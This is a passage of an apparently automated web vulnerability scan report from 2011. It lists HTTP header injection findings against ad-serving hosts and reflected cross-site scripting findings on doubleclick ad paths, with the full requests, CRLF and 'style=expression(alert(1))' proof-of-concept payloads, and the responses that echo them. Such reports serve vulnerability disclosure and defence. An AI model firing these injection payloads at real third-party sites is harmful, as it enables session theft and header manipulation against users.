Referer: http://online.barrons.com//static_html_files/addineyeV2.html?strBanner=gEbServerData%3D%271%3A%3A2284375%3A%3A4891372%3A%3ASite-32928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A139650%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3ASite-30079/Type-20/5198415/d664f754-eb5c-4f36-91a8-9e92f15fb72f/%3A%3A%27%3BgEbBannerData%3D%278157523402478546%3A%3A1%3A%3A336%3A%3A280%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3Afalse%27%3BgEbInteractions%3D%27%5B_eyeblaster%2Chttp%253A//ad.doubleclick.net/click%253Bh%253Dv8/3b07/3/0/*/n%253B239950972%253B0-0%253B0%253B46249204%253B4252-336/280%253B41839080/41856867/1%253B%253B%257Eokv%253D%253B%2521category%253D%253Bpage%253Drightrail%253Bmsrc%253DBOL_other_tnav_analysis%253Bbiz%253D1053%253B%253Bs%253D8_10001%253Bmc%253D0%253Btile%253D9%253Bsz%253D300x250%252C336x280%252C300x600%252C336x850%253B%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253F%2C%5D%27%3BebSrc%3D%27http%253A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_2_2_11.js%27%3BebResourcePath%3D%27http%253A//ds.serving-sys.com/BurstingRes//%27%3B%3BebO%3Dnew%20Object%28%29%3BebO.sms%3D%27ds.serving-sys.com/BurstingScript/%27%3BebO.bs%3D%27bs.serving-sys.com%27%3BebO.fvp%3D%27Res/%27%3BebO.rpv%3D%27_2_5_1%27%3BebO.pv%3D%27_4_5_0%27%3BebO.pi%3D0%3BebO.wv%3D%27_3_0_1%27%3BebPtcl%3D%27http%3A//%27%3BebO.bt%3D5%3BebO.bv%3D11%3BebO.plt%3D9%3BgEbDbgLvl%3D0%3BgnEbLowBWLimit%3D120%3BgnEbMinZIndex%20%3D39%3BgEbURLTokens%20=%20'tp_PlacementID%3D2284375%24%24tp_AdID%3D4891372%24%24';
Origin: http://online.barrons.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=c71f4c38-04bb-446e-a6ab-b7ecdb44dadd3I4070; expires=Fri, 12-Aug-2011 06:59:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=abf61
3eb55aa738
&RES=128&WMPV=0; expires=Fri, 12-Aug-2011 06: 59:47 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:59:46 GMT
Connection: close
Content-Length: 0


3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 7aee8%0d%0a2a120855db7 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4891372~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~898~0~01020^ebAboveTheFoldDuration~898~0~01020&OptOut=0&ebRandom=0.4370704125612974&flv=10.3181&wmpv=0&res=7aee8%0d%0a2a120855db7 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com//static_html_files/addineyeV2.html?strBanner=gEbServerData%3D%271%3A%3A2284375%3A%3A4891372%3A%3ASite-32928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A139650%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3ASite-30079/Type-20/5198415/d664f754-eb5c-4f36-91a8-9e92f15fb72f/%3A%3A%27%3BgEbBannerData%3D%278157523402478546%3A%3A1%3A%3A336%3A%3A280%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3Afalse%27%3BgEbInteractions%3D%27%5B_eyeblaster%2Chttp%253A//ad.doubleclick.net/click%253Bh%253Dv8/3b07/3/0/*/n%253B239950972%253B0-0%253B0%253B46249204%253B4252-336/280%253B41839080/41856867/1%253B%253B%257Eokv%253D%253B%2521category%253D%253Bpage%253Drightrail%253Bmsrc%253DBOL_other_tnav_analysis%253Bbiz%253D1053%253B%253Bs%253D8_10001%253Bmc%253D0%253Btile%253D9%253Bsz%253D300x250%252C336x280%252C300x600%252C336x850%253B%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253F%2C%5D%27%3BebSrc%3D%27http%253A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_2_2_11.js%27%3BebResourcePath%3D%27http%253A//ds.serving-sys.com/BurstingRes//%27%3B%3BebO%3Dnew%20Object%28%29%3BebO.sms%3D%27ds.serving-sys.com/BurstingScript/%27%3BebO.bs%3D%27bs.serving-sys.com%27%3BebO.fvp%3D%27Res/%27%3BebO.rpv%3D%27_2_5_1%27%3BebO.pv%3D%27_4_5_0%27%3BebO.pi%3D0%3BebO.wv%3D%27_3_0_1%27%3BebPtcl%3D%27http%3A//%27%3BebO.bt%3D5%3BebO.bv%3D11%3BebO.plt%3D9%3BgEbDbgLvl%3D0%3BgnEbLowBWLimit%3D120%3BgnEbMinZIndex%20%3D39%3BgEbURLTokens%20=%20'tp_PlacementID%3D2284375%24%24tp_AdID%3D4891372%24%24';
Origin: http://online.barrons.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=5659a0b2-55df-46f4-905c-1fd6fa8ca69b3I4060; expires=Fri, 12-Aug-2011 06:59:48 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=7aee8
2a120855db7
&WMPV=0; expires=Fri, 12-Aug-2011 06: 59:48 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:59:48 GMT
Connection: close
Content-Length: 0


3.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 81dd8%0d%0a96cba21421f was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4891372~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~898~0~01020^ebAboveTheFoldDuration~898~0~01020&OptOut=0&ebRandom=0.4370704125612974&flv=10.3181&wmpv=81dd8%0d%0a96cba21421f&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com//static_html_files/addineyeV2.html?strBanner=gEbServerData%3D%271%3A%3A2284375%3A%3A4891372%3A%3ASite-32928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js%3A%3AExpBanner%3A%3A0%3A%3A%3A%3A%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A1%3A%3A139650%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3ASite-30079/Type-20/5198415/d664f754-eb5c-4f36-91a8-9e92f15fb72f/%3A%3A%27%3BgEbBannerData%3D%278157523402478546%3A%3A1%3A%3A336%3A%3A280%3A%3A%3A%3A%3A%3A1%3A%3A0%3A%3A30%3A%3A%3A%3A%3A%3A%3A%3A0%3A%3A0%3A%3A%3A%3A%3A%3Afalse%27%3BgEbInteractions%3D%27%5B_eyeblaster%2Chttp%253A//ad.doubleclick.net/click%253Bh%253Dv8/3b07/3/0/*/n%253B239950972%253B0-0%253B0%253B46249204%253B4252-336/280%253B41839080/41856867/1%253B%253B%257Eokv%253D%253B%2521category%253D%253Bpage%253Drightrail%253Bmsrc%253DBOL_other_tnav_analysis%253Bbiz%253D1053%253B%253Bs%253D8_10001%253Bmc%253D0%253Btile%253D9%253Bsz%253D300x250%252C336x280%252C300x600%252C336x850%253B%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253F%2C%5D%27%3BebSrc%3D%27http%253A//ds.serving-sys.com/BurstingCachedScripts/ebExpBanner_2_2_11.js%27%3BebResourcePath%3D%27http%253A//ds.serving-sys.com/BurstingRes//%27%3B%3BebO%3Dnew%20Object%28%29%3BebO.sms%3D%27ds.serving-sys.com/BurstingScript/%27%3BebO.bs%3D%27bs.serving-sys.com%27%3BebO.fvp%3D%27Res/%27%3BebO.rpv%3D%27_2_5_1%27%3BebO.pv%3D%27_4_5_0%27%3BebO.pi%3D0%3BebO.wv%3D%27_3_0_1%27%3BebPtcl%3D%27http%3A//%27%3BebO.bt%3D5%3BebO.bv%3D11%3BebO.plt%3D9%3BgEbDbgLvl%3D0%3BgnEbLowBWLimit%3D120%3BgnEbMinZIndex%20%3D39%3BgEbURLTokens%20=%20'tp_PlacementID%3D2284375%24%24tp_AdID%3D4891372%24%24';
Origin: http://online.barrons.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d2b610ab-8d3c-4daa-92a7-ae8bf8a9afd63I4010; expires=Fri, 12-Aug-2011 06:59:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=81dd8
96cba21421f
; expires=Fri, 12-Aug-2011 06: 59:47 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:59:47 GMT
Connection: close
Content-Length: 0


3.6. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/13754-86576-1281-0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a602b%0d%0a7429e651919 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a602b%0d%0a7429e651919/js/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 10:12:39 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-60407-1305367959401-0u; domain=.apmebf.com; path=/; expires=Mon, 13-May-2013 10:12:39 GMT
Location: http://altfarm.mediaplex.com/a602b
7429e651919
/js/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&no_cj_c=1&upsid=182017413646
Content-Length: 583
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/a602b
7429e651919
...[SNIP]...

3.7. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/13754-86576-1281-0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ee78b%0d%0ae1dd2be16ff was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ad/ee78b%0d%0ae1dd2be16ff/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 10:12:39 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-39912-1305367959598-cr; domain=.apmebf.com; path=/; expires=Mon, 13-May-2013 10:12:39 GMT
Location: http://altfarm.mediaplex.com/ad/ee78b
e1dd2be16ff
/13754-86576-1281-0?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&no_cj_c=1&upsid=078282788346
Content-Length: 583
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ee78b
e1dd2be1
...[SNIP]...

3.8. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/13754-86576-1281-0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3a7d1%0d%0a5031ae02666 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ad/js/3a7d1%0d%0a5031ae02666?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 10:12:39 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-55768-1305367959801-72; domain=.apmebf.com; path=/; expires=Mon, 13-May-2013 10:12:39 GMT
Location: http://altfarm.mediaplex.com/ad/js/3a7d1
5031ae02666
?mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f&no_cj_c=1&upsid=294035646314
Content-Length: 567
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/3a7d1
5031a
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next
There are 130 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/b2pfreezone_free

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5e2"style%3d"x%3aexpression(alert(1))"76d27de00ec was submitted in the !category parameter. This input was echoed as ee5e2"style="x:expression(alert(1))"76d27de00ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/b2pfreezone_free;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;ord=1659165916591659;ee5e2"style%3d"x%3aexpression(alert(1))"76d27de00ec HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052970203286304576313262992330454.html?mod=BOL_hpp_dc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:24:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 587

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/z;231253341;0-0;0;20454327;25388-520/30;38882585/38900342/1;;~okv=;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;ee5e2"style="x:expression(alert(1))"76d27de00ec;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWBL_OOT">
...[SNIP]...

4.2. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/b2pfreezone_free

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f363c"style%3d"x%3aexpression(alert(1))"318f1b6bb74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f363c"style="x:expression(alert(1))"318f1b6bb74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/b2pfreezone_free;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;ord=1659165916591659;&f363c"style%3d"x%3aexpression(alert(1))"318f1b6bb74=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052970203286304576313262992330454.html?mod=BOL_hpp_dc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:24:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 590

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/z;231253341;0-0;0;20454327;25388-520/30;38882585/38900342/1;;~okv=;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;&f363c"style="x:expression(alert(1))"318f1b6bb74=1;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWBL_OOT">
...[SNIP]...

4.3. http://ad.doubleclick.net/adi/barrons.com/columnist [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/columnist

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78bb2"style%3d"x%3aexpression(alert(1))"9b4cd51018c was submitted in the !category parameter. This input was echoed as 78bb2"style="x:expression(alert(1))"9b4cd51018c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/columnist;!category=;biz=1053;;s=8_10001;mc=0;tile=4;sz=377x140;ord=2817281728172817;78bb2"style%3d"x%3aexpression(alert(1))"9b4cd51018c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://topics.barrons.com/person/S/michael-santoli/6041
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 544

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/i;241062548;0-0;0;51787543;29332-377/140;42095072/42112859/1;;~okv=;!category=;biz=1053;;s=8_10001;mc=0;tile=4;sz=377x140;78bb2"style="x:expression(alert(1))"9b4cd51018c;~aopt=2/1/ff/1;~sscs=%3fhttp://www.smartmoney.com">
...[SNIP]...

4.4. http://ad.doubleclick.net/adi/barrons.com/public_front [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/public_front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6272f"style%3d"x%3aexpression(alert(1))"8a464770ae9 was submitted in the !category parameter. This input was echoed as 6272f"style="x:expression(alert(1))"8a464770ae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/public_front;!category=;;mc=0;tile=2;sz=280x61;ord=2194219421942194;6272f"style%3d"x%3aexpression(alert(1))"8a464770ae9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:11 GMT
